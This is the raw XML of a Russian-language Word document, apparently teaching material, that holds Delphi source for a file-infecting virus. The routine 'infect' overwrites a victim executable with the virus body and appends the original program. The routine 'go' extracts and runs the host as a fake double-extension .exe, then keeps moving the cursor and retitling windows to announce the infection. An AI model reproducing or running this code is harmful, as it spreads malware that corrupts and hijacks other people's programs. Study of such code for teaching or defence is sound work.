    <w:p w14:paraId="57601117" w14:textId="77777777" w:rsid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B7C7DD8" w14:textId="77777777" w:rsid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1F47CD2" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00AE5F29" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE5F29">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подпрограмма выполнения программы-жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65445A" w14:textId="77777777" w:rsid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6FC1626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>procedure go;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA878C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>label 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ED43C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>var buf:array[1..virsize] of byte; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>буфер</w:t>
      </w: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для</w:t>
      </w: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хранения</w:t>
      </w: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тела</w:t>
      </w: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вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800DB7C" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="000353ED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D0C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nr</w:t>
      </w:r>
      <w:r w:rsidRPr="0076167E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nw</w:t>
      </w:r>
      <w:r w:rsidRPr="0076167E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>longint</w:t>
      </w:r>
      <w:r w:rsidRPr="0076167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//количество байтов прочитано/количество байтов записано</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F10E25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1B88312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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E893D60" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="0076167E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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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fileMode</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:=0;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//режим только чтения файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72048508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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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assignfile(f1,paramstr(0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270792C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reset(f1,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE54ACD" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00BC3F40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D0C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filemode</w:t>
      </w:r>
      <w:r w:rsidRPr="00C449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:=2;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//режим чтения-записи файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A736EB1" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00C449EB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449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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assignFile</w:t>
      </w:r>
      <w:r w:rsidRPr="00C449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00C449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paramstr</w:t>
      </w:r>
      <w:r w:rsidRPr="00C449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(0)+'.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C449EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//подложный файл с двойным расширением</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A5C6E" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00C449EB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68E9E4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49EB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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rewrite(f2,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1821B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seek(f1,virsize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D491B15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seek</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0AB40" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="001E3323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//записываем в подложный файл код программы-жертвы блоками размером </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virsize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6A00C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54BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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repeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6D87C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filemode:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BC4A5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BlockRead(f1,buf,virsize,nr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63BF3E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filemode:=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC7B14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BlockWrite(f2,buf,nr,nw);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA61AA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until ((nr=0) or (nr&lt;&gt;nw));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281A7D3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CloseFile</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53102729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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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CloseFile</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB441C" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="001E3323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06538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>запискаем на выполнение подложный файл с двойным расширением</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430B573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6538">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winexec(pchar(paramstr(0)+ '.exe'), SW_show);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADB6FF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10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325233A6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942712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if not deletefile(pchar(paramstr(0)+'.exe')) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CABA71E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703711F9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setcursorpos(random(800),Random(600));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB962C3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620E9C7E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setwindowtext(GetForeGroundWindow, '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Блокнот</w:t>
      </w:r>
      <w:r w:rsidRPr="00806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</w:t>
      </w:r>
      <w:r w:rsidRPr="00806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ВИРУСОМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10FD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5967CD1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3F3F1B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sleep(400);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64DF33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  goto 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3930D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1BD264C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7323E0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except</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C34224A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144987" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00E10FD8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FD8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0556EF3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D0C54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88E2EE0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A935F8" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54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8848D5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C44B87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подпрограмма</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03F82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44B87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>заражени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03F82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44B87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03F82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44B87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ECFC6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55A1D7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>procedure infect(victim:string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E96CF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>var a:integer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C7E01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buf:array[1..virsize] of byte;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AE179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nr,nw:longint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088DB7D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D591FE8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29C46D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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70614576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randomize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB2C517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assignfile(f1,victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FDBB3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a:=random(200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDC1B6D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rename(f1,'bad'+IntToStr(a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614DD52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FileMode:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B5985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assignfile(f2,paramstr(0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C262F23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reset(f2,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB3A2B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seek(f2,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E233F30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blockread(f2,buf,virsize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393BFDCA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filemode:=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83F0B2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closefile(f2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5ACFC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assignfile(f1,victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA34F6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rewrite(f1,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E8D0B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blockwrite(f1,buf,virsize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5CA5E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assignfile(f2,'bad'+inttostr(a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F15D27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reset(f2,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F7550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seek(f2,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094573B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repeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E32BC0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  BlockRead(f2,buf,virsize,nr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712633B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  BlockWrite(f1,buf,nr,nw);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775994A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until((nr=0)or (nw&lt;&gt;nr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458670F7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A89FB4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closeFile(f1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D038C6A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closeFile(f2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E980D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  deletefile(pchar('bad'+inttostr(a)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BE085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03F8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03F82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B313832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A457C86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03F82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  end;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C720E2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0454FDA" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00D03F82" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="126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03F82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CD6C8" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="00E81933" w:rsidRDefault="003D0C54" w:rsidP="003D0C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0C54" w:rsidRPr="00E81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A096F" w14:textId="77777777" w:rsidR="00631791" w:rsidRDefault="00631791" w:rsidP="003D0C54">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03E00B35" w14:textId="77777777" w:rsidR="00631791" w:rsidRDefault="00631791" w:rsidP="003D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EF4E7" w14:textId="77777777" w:rsidR="00631791" w:rsidRDefault="00631791" w:rsidP="003D0C54">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A2ED136" w14:textId="77777777" w:rsidR="00631791" w:rsidRDefault="00631791" w:rsidP="003D0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33EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02D8898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0BF726E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5FA82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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="21284327"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4DC7AA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28AF6ED5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54E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A3875"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="397CA674"/>
    <w:lvl w:ilvl="0" w:tplc="01D81D7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BB1EB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A7CF65C"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4080"/>
        </w:tabs>
        <w:ind w:left="4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D2"/>
    <w:rsid w:val="0003031D"/>
    <w:rsid w:val="00141712"/>
    <w:rsid w:val="00221C77"/>
    <w:rsid w:val="00222B7F"/>
    <w:rsid w:val="003C3BA9"/>
    <w:rsid w:val="003D0C54"/>
    <w:rsid w:val="003D69B2"/>
    <w:rsid w:val="003D6B27"/>
    <w:rsid w:val="00452D91"/>
    <w:rsid w:val="004D0A42"/>
    <w:rsid w:val="004F2160"/>
    <w:rsid w:val="00551AF1"/>
    <w:rsid w:val="005E5ED1"/>
    <w:rsid w:val="006240AD"/>
    <w:rsid w:val="00631791"/>
    <w:rsid w:val="0069239A"/>
    <w:rsid w:val="00751DC8"/>
    <w:rsid w:val="00783A74"/>
    <w:rsid w:val="00843EB8"/>
    <w:rsid w:val="009C5B0E"/>
    <w:rsid w:val="00A14805"/>
    <w:rsid w:val="00AC4BDC"/>
    <w:rsid w:val="00AD6A37"/>
    <w:rsid w:val="00AE0348"/>
    <w:rsid w:val="00C720B8"/>
    <w:rsid w:val="00C85EB1"/>
    <w:rsid w:val="00CA098A"/>
    <w:rsid w:val="00CB3075"/>
    <w:rsid w:val="00D55609"/>
    <w:rsid w:val="00D77278"/>
    <w:rsid w:val="00DD446A"/>
    <w:rsid w:val="00E0042C"/>
    <w:rsid w:val="00E81933"/>
    <w:rsid w:val="00E84998"/>
    <w:rsid w:val="00F308D2"/>
    <w:rsid w:val="00F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1A2F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C1983E6-087B-4C05-8D89-4600003F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0C54"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D0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0C54"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="003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3D0C54"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:rsid w:val="003D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D0C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3340</Words>
  <Characters>19042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Римма Егорова</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ольга</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-17T07:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-17T07:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>